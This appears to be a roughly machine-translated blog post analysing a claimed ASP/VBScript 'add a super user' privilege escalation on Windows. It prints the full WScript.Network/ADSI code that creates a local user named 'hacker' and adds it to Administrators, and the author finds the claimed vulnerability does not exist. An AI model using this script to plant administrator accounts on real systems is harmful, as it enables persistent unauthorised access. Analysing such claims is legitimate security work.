From lake2
This stuff is gaining popularity. If you do not know it, read the article "add a Super User. ASP code.
The author also said, "the code is correct, but it rarely succeeds. It depends on luck." I tried it on webshell and failed. Remove the error tolerance statement because the error is "insufficient Permissions ". It's okay today. Let's analyze it. Maybe ...... Hey.
The key to his code is this:
Set Lp = server. Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", username)
OD. setpassword passwd
OD. setinfo
Oe. Add Oz & "/" & Username
It is nothing more than creating a wscript. Network object in ASP. Use this object to add users and promote them to administrators. According to their statement, the Local Privilege Escalation Vulnerability of the. Network object was exploited (they said this was not announced by MS ). Well, I will make the code into a vbs script file and get it through the command line.
Test. VBE (VBE is better than vbs; vbs is subject to many restrictions)
--------------------------------------------
Set Lp = Createobject ("wscript. Network ")
Oz = "winnt: //" & LP. computername
Set Ob = GetObject (OZ)
Set OE = GetObject (OZ & "/administrators, group ")
Set OD = OB. Create ("user", "hacker ")
OD. setpassword Test
OD. setinfo
Oe. Add Oz & "/" & "hacker"
-------------------------------------------
Generate a hacker user with the admin permission. If the user permission is executed, the following error occurs: access is denied. It seems that the permission is not enough, that is, the so-called ". Network object local permission Escalation Vulnerability" that is not published by Ms does not exist-at least on my XP SP1. You can also save the above Code as VBE to get the user permission. Next, try to see if this bug exists in other systems. However, this ASP will rarely succeed.
The last time I went back to the login coast, I told me that if IIS had enabled ASP authentication, I could. I disabled the anonymous access to IIS locally. This script can work. However, your browser has administrator permissions. I think it is clear that anonymous access is disabled. Why didn't a dialog box pop up asking you to lose your user password? Haha, you naturally integrate Windows Basic verification locally. At this time, I am the Administrator. Of course, ASP also inherits the admin permission. I don't know if the author has an error here?
I think this legend is wrong. Thank you for your advice. Let's talk about it first. You are not allowed to face it. ^_^